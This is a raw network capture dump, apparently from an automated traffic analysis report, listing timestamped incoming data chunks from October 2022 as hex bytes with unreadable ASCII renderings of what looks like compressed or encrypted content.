                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24680INData Raw: 81 50 92 39 c7 3a 95 92 55 bf 6a 48 ee fb e3 f5 aa 08 2e 81 f1 4b f3 66 4b b2 cb 18 42 55 51 7c 7d 80 74 0b 36 18 b8 0f 92 65 6d e3 a5 6a 59 8a 59 12 cb 22 29 6d ab bf 0f 7f 28 a2 bd ff b3 c9 10 33 bd 23 8b 20 99 ec cf 35 29 a7 ba b5 d5 22 22 7f 8c 80 18 2c b6 3b eb 0a f5 0c c8 55 67 74 37 6b 33 97 48 d2 c1 e0 19 b0 fd 23 3a ae 0f b0 ed e1 40 48 d8 7f c7 33 5e 6e 07 e1 31 4c ca 63 29 f3 a1 c1 f6 1c 4b 8e 32 17 3a e2 b1 64 46 10 bc e2 97 da 23 54 40 5f 5a b1 41 9f 88 29 cc 35 98 64 40 b7 af f4 54 b6 e8 eb 52 81 49 75 2d af 47 25 89 b1 a1 c6 c1 a9 5b ab f3 0d 4a a0 92 85 3c eb 65 76 19 16 6d 6c 6a f3 c5 4a 08 66 49 91 97 a3 4d 52 67 1c 79 af 91 af 9f a7 7d c1 13 52 5c 60 28 1a 90 9e f0 fa 9d 18 20 74 22 78 0f 32 4b ae c8 35 2f 46 f6 60 1d 2f 88 90 b2 e4 ce
                                                                                                                                                                                                                                    Data Ascii: P9:UjH.KfKBUQ|}t6emjYY")m(3# 5)"",;Ugt7k3H#:@H3^n1Lc)K2:dF#T@_ZA)5d@TRIu-G%[J<evmljJfIMRgy}R\`( t"x2K5/F`/
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24696INData Raw: 69 7c b5 e4 eb 2c 53 54 4b 85 32 8a bf 25 4e 85 97 03 f9 57 1d af 17 d1 ef 0d df 06 8e 8d 64 ff ac 0c 44 11 ac 01 59 c2 e3 f9 d3 c6 29 d6 da 0d 68 2c ca b3 8e 02 55 c5 31 a8 de f5 d3 0f 81 f5 fa 0d c1 0a f8 5e b1 e9 d6 1f ce 48 c7 6f b5 19 f3 2b 9f 02 94 c1 62 90 89 ee 90 4c 42 a4 9e 83 f9 1e 6e ca e7 dc b3 5f 00 2d 30 36 f5 e6 8d 38 3c a3 6a 5e f1 24 02 a4 c7 86 e9 90 2b 89 a6 68 c9 99 47 ca 55 94 74 57 49 14 43 1b b0 58 83 74 53 1c 7c 94 99 83 f5 1d 13 96 cd dd 1a 76 80 1d 3c 2a bc 6f 80 b8 c0 99 c6 e2 dd 20 e3 15 e8 49 ff 4b 14 58 44 61 1f 9a 00 3a fe 8d 21 3c 3e 0d c8 3b f2 fb 5d fc 09 02 a1 f4 1d 41 6f eb 62 18 c9 9d 7f 78 40 a1 ce 77 80 ea 8e f7 94 2d 1b 9b d6 57 79 19 7e b8 94 ec ee 0e 74 a8 31 d9 3d 41 86 14 1e e8 fe 8d 99 d1 aa 24 c5 d8 f8 77 6c
                                                                                                                                                                                                                                    Data Ascii: i|,STK2%NWdDY)h,U1^Ho+bLBn_-068<j^$+hGUtWICXtS|v<*o IKXDa:!<>;]Aobx@w-Wy~t1=A$wl
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24712INData Raw: d8 7c 00 88 c1 b8 32 7c 9d 46 f7 16 cd 73 34 6f b7 94 cf fc 02 72 2c b9 36 23 fc 37 74 5a b3 07 45 dc 6e 7e fd 9b 44 4d 0f 61 88 57 bb f2 0d 1b 5c 2f ce 8f 86 c6 3a fe 49 30 a5 d3 8f 1e c5 0e 87 e5 f0 3c d1 c9 01 07 b0 40 42 1a 87 3d 22 2d 9d c3 46 a9 06 61 ca 3d aa 09 1b 46 b3 14 5a e5 7b bf 22 6b b1 3d 94 a0 c6 70 02 e4 32 28 bf 4f ee f1 55 1d 7b dc cd 72 de 29 63 cb a2 99 da a0 ab f6 46 4a da 6a 2a 82 48 62 1d c5 f4 e1 90 e1 89 ae cf 12 44 b3 83 12 de 38 73 92 6f bf a7 0d 13 eb 76 63 67 15 a2 a8 d5 b6 80 70 13 3c 50 5b c6 fd 15 04 07 38 db c9 77 14 a3 19 d8 57 60 ae 64 b2 7e 74 3a f9 45 b9 79 6b b9 1c 43 ce 65 b6 c7 c0 8f 26 a8 b7 6f 41 26 ee 68 26 fa d5 e1 b2 73 1f 80 93 f1 83 51 36 13 f4 d4 f5 73 58 1a 46 0e 05 95 d7 88 38 b2 78 e3 67 91 9f 7d 28 12
                                                                                                                                                                                                                                    Data Ascii: |2|Fs4or,6#7tZEn~DMaW\/:I0<@B="-Fa=FZ{"k=p2(OU{r)cFJj*HbD8sovcgp<P[8wW`d~t:EykCe&oA&h&sQ6sXF8xg}(
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24728INData Raw: ab a6 b2 88 f7 89 81 09 4c 80 c3 39 ad 4b 4e f2 2e 0a 38 9d 11 da cd 94 10 15 e5 66 d3 f3 2c 4a 91 16 93 55 73 64 f9 f2 1a b5 47 cf 9c b9 44 6e 62 51 c7 15 8f 3f 92 09 0c 7e 71 8b 6b 6b a2 2c 2a f9 51 2c d7 04 cc f6 5d 21 ff 3f 14 ce 10 c9 96 e2 be c3 a4 c3 10 31 06 56 5a c3 7a f8 6a cd ea 1c 9e e5 12 47 db 38 33 e1 bf 02 28 88 34 60 53 e2 9d 78 e5 c7 08 2b 5d 3e ce b3 43 36 a9 51 ab 37 4f b5 e4 bf e7 f8 87 06 95 3c 7d 9f 82 2a 7d ab 37 9a 1e 62 ec d9 36 e8 c3 f4 dd b8 a9 31 09 23 10 22 9b 2e c7 88 30 45 22 3e 6d 9d a5 3e 53 3e bf c7 c2 51 9e 40 da 1a 5e 9c 33 e3 e6 ac 6b 9e ac d8 c6 ab f4 7c ee 4f c8 99 e0 11 f3 21 02 8a 6e 72 ce 98 f9 b6 56 9c 46 9e 58 d1 40 68 f7 cf 21 d5 09 f1 52 3a b2 1b 47 0a cb ca 52 e0 0f 68 55 b1 71 1d 1f 77 ac fe 4e 37 63 cf 5c
                                                                                                                                                                                                                                    Data Ascii: L9KN.8f,JUsdGDnbQ?~qkk,*Q,]!?1VZzjG83(4`Sx+]>C6Q7O<}*}7b61#".0E">m>S>Q@^3k|O!nrVFX@h!R:GRhUqwN7c\
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24744INData Raw: 1c 5a 11 08 0b 30 82 f3 2b 79 71 54 55 8a f0 8a 3d 39 f2 85 e6 f3 a7 cc 11 4c 73 78 af 8c e9 7a 66 1d 27 2f 9e 75 83 09 a0 92 af cc 0f cd 0b d7 2c dd 09 58 fa 43 0a b5 fd 60 e3 17 10 b8 3f 2e 35 c6 27 8d c6 89 53 ac 8f a0 71 0a 39 92 d5 06 cf 58 0d 7f 2f 61 24 e8 6a 05 f2 f0 fb fd 0e d2 4d 0b 4e c9 20 2e 7c f1 02 e4 51 79 cd d4 ec 0a 07 f3 d6 71 82 26 c2 9d b3 2b 4d 3a 31 e1 ca 14 72 e6 99 e4 a0 94 ac 9b 88 cb b0 75 d6 9e 5c ad e8 fe fd c2 10 a5 f1 09 01 a4 47 c8 a2 79 d3 48 5c 4b 75 74 88 df c4 75 9b 28 16 b7 ad 89 f6 b7 26 79 e8 72 ed e5 bb 66 1a 0f de 6a 10 f4 15 d2 eb 01 11 d8 37 f2 8e 95 36 2b b5 21 32 97 29 34 96 a6 8e 78 4b 27 3c 95 ac c3 41 0d a2 6b 7d ed 55 28 ee de 4b b0 74 69 e3 87 00 aa 46 65 7a 6b cc fa cf 10 4a 89 b7 3d ee 3a 63 9e 1f 0b 3c
                                                                                                                                                                                                                                    Data Ascii: Z0+yqTU=9Lsxzf'/u,XC`?.5'Sq9X/a$jMN .|Qyq&+M:1ru\GyH\Kutu(&yrfj76+!2)4xK'<Ak}U(KtiFezkJ=:c<
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24760INData Raw: 6f bd 58 8e 1f dd 49 3c c2 cc 83 d1 14 93 c4 cd de e0 d0 b5 5e 86 ea ed 9a 0c 13 72 b4 1b fe 55 f8 40 cf 98 7c bc 9b da ff 55 10 14 d1 e4 b8 c2 33 2c 7b 4c 4e ee 47 28 29 f0 8e e5 0a 9d 90 7d cc b4 e4 42 56 17 21 24 c7 2c de 63 ac 56 e2 32 78 43 96 53 86 3b 9f be aa a0 b4 c5 c0 da ae 83 62 38 fc 40 80 36 c0 6a 50 95 57 f6 1d a0 65 5b c2 94 e9 5f 13 cc 24 8b a9 7e a9 67 8b 63 d9 53 e9 03 aa ed 8f 6c 00 bd ec ae 0f de cd 13 74 b8 e6 03 54 c9 c9 af aa 32 a2 dd 9d 5f 2d b6 57 c0 f5 51 5f 3a 09 96 e6 cf e0 ee f6 03 9a 48 3b d9 6b 98 98 b9 6d 6b ae 8b 9e 1d 6c aa 6e a4 ea 65 d5 f3 d2 03 06 f0 2f ad e4 6e f5 95 53 80 3b 18 25 39 fd 08 00 66 98 fa 01 0b 27 75 b9 be 32 0e c0 f0 27 72 cd 86 56 cf 99 0a fb c1 5a ea bf 0e 01 d6 e7 c7 87 94 c2 7e 78 73 3a 9b 82 09 37
                                                                                                                                                                                                                                    Data Ascii: oXI<^rU@|U3,{LNG()}BV!$,cV2xCS;b8@6jPWe[_$~gcSltT2_-WQ_:H;kmklne/nS;%9f'u2'rVZ~xs:7
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24776INData Raw: c6 da 31 f3 ed a9 ca 7f 58 f2 2b 8f 37 6f 21 10 14 0a 1c 50 64 a7 c1 e2 28 ed 64 cf 39 0d 88 d6 d6 37 4b a6 a9 a8 e2 3a 34 3c 03 21 2e 15 54 3c 8b da 3e 07 a1 74 c3 2a cf 76 83 4d 75 a1 9c 4d 37 03 83 ea a9 2a 6d 62 a7 1b 00 00 af 47 56 16 87 c2 2e 50 e7 7c 94 91 9f 1c 3b a5 3a 27 42 1f 8e f1 2d ba f7 35 d7 a0 49 68 aa 68 36 2b 15 18 46 2d 60 27 57 e9 c9 6b f9 e4 7a 73 d4 f7 22 c1 9a 1a 96 fc ac ce 41 c5 aa e3 dd 36 59 d1 98 71 12 50 cb bb ce fe e2 17 97 36 a6 02 e7 93 1d e3 99 64 01 42 8a 02 58 6d f0 53 0d 25 91 75 d4 5c e6 57 0c 34 02 72 3d b3 c3 36 8b 19 46 32 fa 2e 53 1b 23 ce 92 c1 4f 52 61 01 a6 f1 5a 33 5b 02 48 6c d8 60 4e 46 df 84 a2 48 6c c0 ca 69 a8 5d 11 ed 8f 8b ae 7b a7 98 f3 21 c2 3e 33 85 af 00 92 5c ff 9f a8 d6 d4 96 d6 5e 29 df 52 e4 83
                                                                                                                                                                                                                                    Data Ascii: 1X+7o!Pd(d97K:4<!.T<>t*vMuM7*mbGV.P|;:'B-5Ihh6+F-`'Wkzs"A6YqP6dBXmS%u\W4r=6F2.S#ORaZ3[Hl`NFHli]{!>3\^)R
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24792INData Raw: 26 2a ec e3 de e4 77 64 e6 55 b0 08 de a4 1c 92 71 d3 cd ca 63 56 e7 14 70 e1 a5 46 65 20 46 f7 f3 44 f9 59 02 77 83 9a d8 2f 04 1e 12 81 9b f4 3f 89 b1 38 c1 f3 fe 4e 63 ff 1c f6 53 18 89 ac 0b 67 4d 23 19 ec 83 48 67 32 82 ac 78 06 71 6f f5 74 61 8f b4 5a 1e a4 ad 13 e2 08 30 dc aa cb a5 91 4f fe 12 59 28 bf 20 a4 21 91 73 4e 99 97 7b 84 31 1c c8 22 3b 95 5c f5 3f a3 d8 c7 3b 53 25 f5 ca 4b b9 d5 7d 82 b7 7b ab ff 1a 11 b1 ac 20 ba 58 a5 12 54 80 22 40 15 f7 31 25 db 38 c3 01 fe aa af 29 28 e0 a5 17 0c 0f fa 93 23 27 b6 de 5e f6 19 cf ee 08 d2 ec ea e4 50 74 89 61 ca c5 17 55 2b 92 3f 7b 0a e5 b4 d4 cd 2a f2 c7 91 48 5a 52 8a f9 62 9a 97 dc 6e ce 58 03 4d f2 53 fa 3e a8 59 0d b7 ec 7f 45 56 4c e3 92 8a d4 ef 23 47 02 d9 b2 b4 2f 1a 1d 10 00 1d 84 39 54
                                                                                                                                                                                                                                    Data Ascii: &*wdUqcVpFe FDYw/?8NcSgM#Hg2xqotaZ0OY( !sN{1";\?;S%K}{ XT"@1%8)(#'^PtaU+?{*HZRbnXMS>YEVL#G/9T
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24808INData Raw: 7e d7 47 08 61 49 5f 51 b7 1f 5e bf 32 51 de dd 71 5a 5d 08 5d e7 a9 8f aa af d4 8d 4f 31 dc fa 19 3c 01 33 65 e2 e3 19 9e 5c 57 ee 92 d3 81 99 6d 02 0e a2 02 d7 22 bd 3c 5f ef 04 57 a8 fe 86 9c 29 0a 5b b4 83 38 4b 05 62 d3 e8 7e 76 e6 20 e0 c6 fd 9b f6 4f 0f d8 40 6a 5b 0b 35 56 b1 17 1f 8f 92 12 67 b5 19 47 75 36 95 82 ae 27 31 f1 6a 87 07 21 37 52 bc 9e c1 6c c8 00 11 12 ca 6d 14 e9 c6 87 29 2f f7 63 51 52 cc be 03 5b e3 2d 4e 01 16 ec 9a bc ba 4c 81 1f f6 c8 25 ad 7b 15 b8 99 51 96 00 4e 4b b4 0f 7f 90 0c 0a ed 3c 10 64 de a8 a1 15 6b 67 2e 19 60 4c b9 ea 20 83 7c a0 e8 14 86 57 23 d5 ee 56 87 1f 67 c8 a7 e0 f9 9d ca 8d 3a ef ba f6 d7 33 2a 4c 91 8f 9a cb 8f ed ef f6 57 b9 99 f3 81 c0 a8 84 06 64 7e 95 a7 7d ae 88 47 78 21 40 ea 50 36 ea 11 82 50 eb
                                                                                                                                                                                                                                    Data Ascii: ~GaI_Q^2QqZ]]O1<3e\Wm"<_W)[8Kb~v O@j[5VgGu6'1j!7Rlm)/cQR[-NL%{QNK<dkg.`L |W#Vg:3*LWd~}Gx!@P6P
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24824INData Raw: 10 10 97 f4 ad 25 3a b0 a5 08 cb 94 d8 0d 8f 53 d6 27 ee 67 a6 ff 8e af 63 f0 2d e4 92 6a 85 f8 f1 a4 c0 39 ab f6 c7 56 18 4e 70 de f0 79 14 1b a3 49 a5 aa ab 71 ad 2b 1c fb 13 09 b1 62 b9 22 80 74 18 1e 14 ea 81 15 7a cc b4 09 1a 56 aa 3a 1a fd 29 94 ad 42 bb e0 28 c8 85 64 8a b1 76 fe 04 dc 63 7c dd 7a e0 7c 4a 33 94 46 bf 93 58 3f d6 79 f4 fa d7 d7 b6 df e2 5d 8f a2 ea fc df 88 27 62 96 eb c3 9f fb f1 4b 20 a3 33 82 ec 27 51 c2 d0 e8 f9 2e 5d 7d 5d 81 49 64 6c 77 57 45 ef 2b 70 70 81 c5 9c 54 77 b2 75 4b 1e 3d f0 ba 23 d8 f5 36 56 69 2f 5f 29 2f ab da c8 3a b2 46 75 97 ae 0c 3d 7e b3 3a 95 21 e9 42 15 5b b2 1e ec 90 4a cf 4a 17 71 c7 56 be c4 1a 9a ef 27 9c b0 e9 b1 dd e6 f6 a6 e2 50 ff b4 fe 46 4d 5e 7a 40 10 9a 09 78 0a fb 57 15 86 19 28 25 16 ef 78
                                                                                                                                                                                                                                    Data Ascii: %:S'gc-j9VNpyIq+b"tzV:)B(dvc|z|J3FX?y]'bK 3'Q.]}]IdlwWE+ppTwuK=#6Vi/_)/:Fu=~:!B[JJqV'PFM^z@xW(%x
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24840INData Raw: 23 3a 1a c9 41 97 c2 5d 31 7a dc 82 49 c7 f3 d7 50 f9 b2 9f f4 15 c4 75 e4 33 92 42 88 02 18 d9 03 0b e4 8b fb 89 7f bb fc 3e 0d 5d 8e 88 cc bb 65 56 2b 33 05 2d 00 c0 7f 03 98 f7 aa ac f0 cb 5c 6f c4 6a e7 61 38 ff bd a5 63 34 07 30 fb 68 76 b4 52 0c 7a 8e e7 55 63 e7 fc e5 91 f7 b0 24 e6 92 fb 23 2c de 09 8b a4 21 a9 d3 7a 2c d6 2b 25 72 f3 44 24 de 58 76 e9 26 e3 65 ff 7d bf 28 41 f5 77 bb 6e 8a c2 dd f2 d6 2d 27 6c 74 dc e2 b4 22 4e 4d 3b 4d d0 ad 2c b9 2b c6 d2 60 f4 25 da 08 14 3a 86 72 ce 29 91 3d cd 24 e6 1b e8 08 5c 68 43 a6 23 7d d3 1a 3c e6 33 02 1c c6 00 1e 43 ff 1d 09 1f cb 31 c1 52 b2 69 40 4e 0b 34 07 85 0e 47 3c 6f 46 4a e5 f5 d4 18 ad 84 4b e6 96 cf c0 6c 65 77 9e 92 d3 4a ae 52 c8 46 d2 a6 39 30 3d a1 52 e0 c9 ab 78 b4 47 de 68 a1 6a 6d
                                                                                                                                                                                                                                    Data Ascii: #:A]1zIPu3B>]eV+3-\oja8c40hvRzUc$#,!z,+%rD$Xv&e}(Awn-'lt"NM;M,+`%:r)=$\hC#}<3C1Ri@N4G<oFJKlewJRF90=RxGhjm
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24856INData Raw: 01 6d 85 4e 83 40 fd 1d 88 5e 98 26 c4 2d 0d ac af d3 d1 18 78 61 62 25 c2 30 8f 1b 64 ec 08 6a 1f c0 7f d0 b5 a3 d9 b4 00 fc 83 3e 0a 1d e9 85 18 9c a6 43 41 1f e7 49 a3 e1 61 18 54 ac 83 12 fc 3f f1 78 fb e6 a6 b3 f4 f3 ae cd 65 05 86 22 11 3b 2e 5d cb 69 8f e0 f6 8d 76 65 89 d1 a8 1b c4 cb 6f 4b 5a 07 df 57 1b 72 7d df 15 b4 cd b0 f5 1c c3 7b 15 b0 72 98 e1 53 84 71 94 ed 06 b6 65 56 bd 15 0e c7 29 5c 57 0f 7c 2c cb 36 d7 6c f4 53 b3 12 84 a0 9d e6 82 51 fe c3 3f ad d1 2e 3b 22 07 7e c0 ee 7c 29 53 fc ee 25 ad e3 72 e2 68 17 1d 73 90 3c 24 34 c4 5b 9f da be f9 68 23 25 61 5a 22 50 8e 1c de 41 26 9e 68 63 bc 48 04 20 db 8c ae 85 f1 e1 90 f7 cb a0 6e 3e 28 19 b6 51 8d de 21 b0 0e 15 0b 2b 60 7b 15 d3 52 f0 9c f2 c6 86 0c ee 9d cd 13 05 62 0d d8 54 c7 54
                                                                                                                                                                                                                                    Data Ascii: mN@^&-xab%0dj>CAIaT?xe";.]iveoKZWr}{rSqeV)\W|,6lSQ?.;"~|)S%rhs<$4[h#%aZ"PA&hcH n>(Q!+`{RbTT
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24872INData Raw: 74 1a 00 ae 06 33 b7 14 c1 47 ee b4 22 ca 77 48 74 59 ee 64 b5 da 07 62 1a 0c 4c 5e ac 1c 98 d1 e8 38 5e 41 73 22 15 22 d6 fd cf 12 e5 cc c4 fc 24 89 b8 79 33 e9 2b e3 53 7c 40 7e ea 4c eb ae 24 56 6b 66 ec 88 eb eb ff 4e cb 70 ce 01 fc d3 fc 5c 31 ba b3 0e 1d 4a 69 7a 17 ec c0 a1 f1 cf 7c b8 8e 37 e8 67 99 6d 42 05 71 4b d4 28 e9 e8 3a 77 10 b8 13 39 25 a6 35 b1 22 d5 1d 72 db 9c 39 39 75 2c 4e 84 df 72 8e 43 28 8d 33 b2 8e 5f 51 be cd 1b 5f 8c 48 a7 5e fb 75 d6 e7 0c 72 f8 b3 91 99 e3 fe ec 51 da ac b7 0d 40 bb 80 8f 91 20 01 67 44 bd 5a b5 d8 8a 81 a6 35 bf 91 94 e6 e2 7f 02 ba 62 8d 4a f1 c6 fb 4e cf 8e 57 62 71 e9 ef a6 f1 c3 4f 0a 9a 95 6c f6 a4 b0 c5 0e 9c 11 81 73 ce a6 48 03 55 5b 23 c6 e8 a8 4e 58 06 8a 8b ae 56 e3 7f ef 76 64 d3 95 27 c8 ef 3e
                                                                                                                                                                                                                                    Data Ascii: t3G"wHtYdbL^8^As""$y3+S|@~L$VkfNp\1Jiz|7gmBqK(:w9%5"r99u,NrC(3_Q_H^urQ@ gDZ5bJNWbqOlsHU[#NXVvd'>
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24888INData Raw: d2 db 57 32 2e 5d b2 3e 60 d8 8f c2 0a 3a 50 f9 00 26 b7 da eb eb cd 67 56 5b 0f 2f 0c 34 6e eb e5 8b 18 e2 36 1a 66 00 3a 71 23 30 1e 05 e0 2b aa c0 6c dd 13 da 45 6b 42 0c e2 19 60 ef c7 6b 12 1b 50 ab a4 73 92 0b c5 35 58 27 9a 64 77 1f 67 e3 75 10 79 d8 a0 43 6e 88 f5 76 8f e0 b5 af c0 77 58 87 17 66 1c 1f f4 c1 76 11 3c 01 9f 22 a3 ad 0e b4 50 59 d5 75 b5 0b a7 67 b4 bb 06 14 86 01 b4 50 d2 3f 4d 96 7d c6 fa 17 5c 77 07 93 b5 6d a2 0b b2 09 bf 4a dd a2 84 41 bf b6 ac a4 79 b7 a3 6a 76 fa 3f d0 e3 7f 6e b5 06 a4 87 37 36 b6 b3 bb 66 c8 75 04 72 d3 49 e0 a8 45 28 31 df d8 d0 68 16 87 d2 ff e7 3e 00 be 69 d1 47 a4 47 aa 0c 5a 3f 48 bf e7 8f ed 29 da 4f bf 3c e6 eb 18 17 6a 62 04 23 f1 2e 83 6b fc fa 30 59 47 14 94 ec 03 e4 7e b1 7e 14 50 a4 5f 85 f4 f5
                                                                                                                                                                                                                                    Data Ascii: W2.]>`:P&gV[/4n6f:q#0+lEkB`kPs5X'dwguyCnvwXfv<"PYugP?M}\wmJAyjv?n76furIE(1h>iGGZ?H)O<jb#.k0YG~~P_
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24904INData Raw: b2 d3 3f 5a 4e c1 83 90 49 c6 8f 3f d3 d8 31 62 7a cc a9 22 2a a9 2d fc 95 5c 28 e6 33 29 2d 41 f7 25 cc 08 b6 fb b8 3f 51 20 f7 7f 88 1d 17 25 94 51 ef 6f 6c b1 25 0f 3d b8 34 8f 19 6b 5e 05 74 d6 37 65 11 1b 9b 76 62 14 a3 23 e4 77 3b 2d e7 8c dd f7 62 05 f8 f2 fe f2 23 41 8a ac e1 bc db fd 3c 4c 87 8c bc 0e de 8d 54 98 13 99 87 be dd 0d 96 fa ef 60 0d 06 7f 70 2c 4d 63 ee 82 f0 6c 54 fa 68 73 21 7d f7 37 6b 2f cd 8b aa 4c c9 ba 7f f4 48 57 0f ef 9d 3d fb 8f ab 2a 56 9c b2 cb 34 f3 35 23 a1 21 a3 f7 82 f6 ba 6f 28 47 8a 97 86 9a e3 dd 1e aa e5 8a 87 17 39 1b f5 42 da 87 93 89 ca e8 ae 61 5f 37 32 e9 bb 5e cf 66 65 f8 d7 4f ae 30 f7 de 31 11 f9 39 15 7d 0f f1 5f 41 99 c9 e3 02 86 f6 ff 6e d8 97 40 9b fc 58 40 c4 bb d7 47 20 90 10 32 61 1d d3 41 ce c5 0f
                                                                                                                                                                                                                                    Data Ascii: ?ZNI?1bz"*-\(3)-A%?Q %Qol%=4k^t7evb#w;-b#A<LT`p,MclThs!}7k/LHW=*V45#!o(G9Ba_72^feO019}_An@X@G 2aA
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24920INData Raw: 32 a2 2c c8 0b 6f b7 41 a4 3f 1c ea 6f 88 f4 f0 eb eb 04 59 f5 81 56 e3 0a 2b f6 23 35 73 f6 08 1f a1 ba 6f 4a 54 ac b3 de 8f 2c ee 2e e0 0a fa 4a 8a ab d7 35 0c 71 8f e8 aa e7 0b b7 dd 79 22 79 d1 8f 2f 3a 94 66 b4 8a 10 e7 c9 70 ac a8 ff 79 f9 4b 70 af 36 ad 57 81 ec 4f 61 55 77 26 46 84 72 38 3d 1e 48 d9 f5 51 09 f0 9c cd 2e 6f d7 bb 15 10 b9 83 92 f0 8b 1f 4b 91 8f 33 2a ac 77 85 e1 25 eb d7 90 cf 4b 52 a4 f8 b0 fd ee a7 71 27 b5 4c 21 3f 56 8a 4d 71 d3 1a 5a cc 42 ca 18 b3 31 ec 1b 96 e5 47 6c 01 05 c6 1f af 6f aa 43 da c6 bb 5c fe 94 22 94 6a 49 ea 33 16 4d 43 b0 de 9d 03 18 a8 e6 a1 0b f9 70 fc 7f 9c a6 30 e5 22 74 14 2e 3a 98 12 03 30 ad 90 ef bd e3 76 e2 f0 ca 87 8b 14 3a 4d 64 1f af cb 23 cb d8 ac c1 e4 e0 99 66 48 7f f7 71 61 88 76 11 9c 6f 92
                                                                                                                                                                                                                                    Data Ascii: 2,oA?oYV+#5soJT,.J5qy"y/:fpyKp6WOaUw&Fr8=HQ.oK3*w%KRq'L!?VMqZB1GloC\"jI3MCp0"t.:0v:Md#fHqavo
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24936INData Raw: 60 84 61 ba 84 ac fc aa f6 41 44 78 f2 c3 2c 22 29 f4 ce d9 f8 27 0a 51 0a 86 cb 5f 06 6c 68 54 90 39 c9 bd b0 71 13 7c 84 2d ce 88 43 41 c5 19 59 38 c3 91 dc fb a1 17 10 ce f5 66 af 49 42 71 69 09 a1 ca 50 3d c6 e7 72 ff 4a df e3 92 bd f1 84 cf 7e f9 cf 70 e6 94 74 68 4e 3b 76 a2 86 3d 78 fb c3 34 b3 c2 be 98 36 c2 89 8d 3e 27 da a3 61 c8 f7 19 b2 f2 97 54 f6 27 87 4c d4 1c 3c bb 91 f4 67 89 1c 49 f8 35 1d 08 1e 6a 01 44 4a d2 52 26 00 1e 0f 71 5a 20 2b 0a 06 4e 2a b4 1c a7 b1 99 a2 59 41 2f 30 cd fa d1 1d cf f0 5e 33 5c e4 a8 a9 8b e4 4c 1e 91 e8 80 39 c6 b4 58 20 d7 e9 80 25 ca 0f 4b 72 a9 84 21 b4 5a e8 b0 bf dc 25 0f 09 27 be 4d bd b2 c2 27 3a 2a f0 42 01 8e 7e 44 fd 07 e5 f0 42 c6 ac a1 bb 04 dd a5 07 31 bd 67 b0 64 88 32 6b b9 26 b1 9e 24 92 d6 3f
                                                                                                                                                                                                                                    Data Ascii: `aADx,")'Q_lhT9q|-CAY8fIBqiP=rJ~pthN;v=x46>'aT'L<gI5jDJR&qZ +N*YA/0^3\L9X %Kr!Z%'M':*B~DB1gd2k&$?
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24952INData Raw: c3 1a 7b 49 4d 92 7f 30 3e 63 60 c1 47 68 37 ef ae fe 52 da 52 e9 06 5c 6c 18 ad ff 0e 3a 8e b1 cc fe c6 bf ae 7c e7 bd f2 8e 91 9f 58 d4 65 1e 8a f4 18 3c ff 68 04 fd ed 1f 9d 5f 32 0c 14 ff 97 39 f2 d5 91 b5 9a 4b ea ea d8 43 99 4a b8 19 70 0a cf fb c4 69 fd 93 bf 91 a0 86 88 b5 bf 91 1c af ef 6c 73 44 f3 2a 2e 42 07 34 4e 31 e8 37 17 65 c9 b3 31 fa ad 3b aa b1 15 57 5b 41 b5 4c 29 03 ae f3 9d bf b5 e6 cd e4 84 19 42 d2 4d 3f e6 fa f1 02 23 ad db 2c ac 60 0e 45 75 d3 c5 fd e5 83 fc 97 aa 40 32 39 f3 e6 4a 14 c8 2d 76 bd 71 75 56 13 3d 56 92 12 d8 16 6e 4d 95 fb e1 46 cf e8 92 e9 31 3b 6d 00 c8 63 20 58 7f c7 a9 08 34 4a 74 82 3c 78 31 bf c6 48 81 b1 5d f7 7d 32 b7 f3 1b ce c3 7c b7 8f 43 ad 34 81 fd 77 56 4a 81 55 aa 6f 8b 29 b7 61 42 3a 86 28 3a 02 45
                                                                                                                                                                                                                                    Data Ascii: {IM0>c`Gh7RR\l:|Xe<h_29KCJpilsD*.B4N17e1;W[AL)BM?#,`Eu@29J-vquV=VnMF1;mc X4Jt<x1H]}2|C4wVJUo)aB:(:E
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC24968INData Raw: 06 72 c0 30 9b 90 6a c0 2c f2 ed 2e 54 3c b8 67 fb 3e 87 a4 ec a0 ea 64 72 ba 39 17 1e a9 c3 7a 26 ed 23 b8 d5 37 e3 6d 1f 97 e5 29 8e b9 73 35 ca 8a 4f 28 13 e8 29 a3 4e 2c b5 d8 ee 8e 29 75 b5 80 5a 4b d8 f6 42 2f 43 76 9e 6c ef 39 be 0b 3b b1 25 3f 0a b7 90 b4 b5 34 4c df e9 dc 8b fb 2b ee f9 e5 73 fd 16 17 fa 39 24 56 af d7 4a e0 33 8f 63 d1 83 7f bf 18 04 74 04 c7 6c 98 7d e4 fc f1 57 6d b3 53 0d cc ed 13 21 e7 97 1d a9 8b 8a bb 3d 94 7d 78 2f dc cd c6 5b df 3e 89 5f 94 ad cd 0a df 9f 60 a1 f1 89 9f 91 58 20 c3 22 4d df 66 cb 23 54 3a db f1 95 70 13 6e d8 0a d4 ec d7 36 26 50 2e cd 29 19 2c 33 09 2f c2 bf 0c 01 7c cd a9 ba 52 46 b5 eb 4b 4e d4 2c 16 6f a5 e4 e2 2b 89 26 88 61 e2 c2 c9 4f f2 10 13 49 c9 7b db 78 40 ab f2 57 21 37 8f ab f5 40 c1 50 22
                                                                                                                                                                                                                                    Data Ascii: r0j,.T<g>dr9z&#7m)s5O()N,)uZKB/Cvl9;%?4L+s9$VJ3ctl}WmS!=}x/[>_`X "Mf#T:pn6&P.),3/|RFKN,o+&aOI{x@W!7@P"
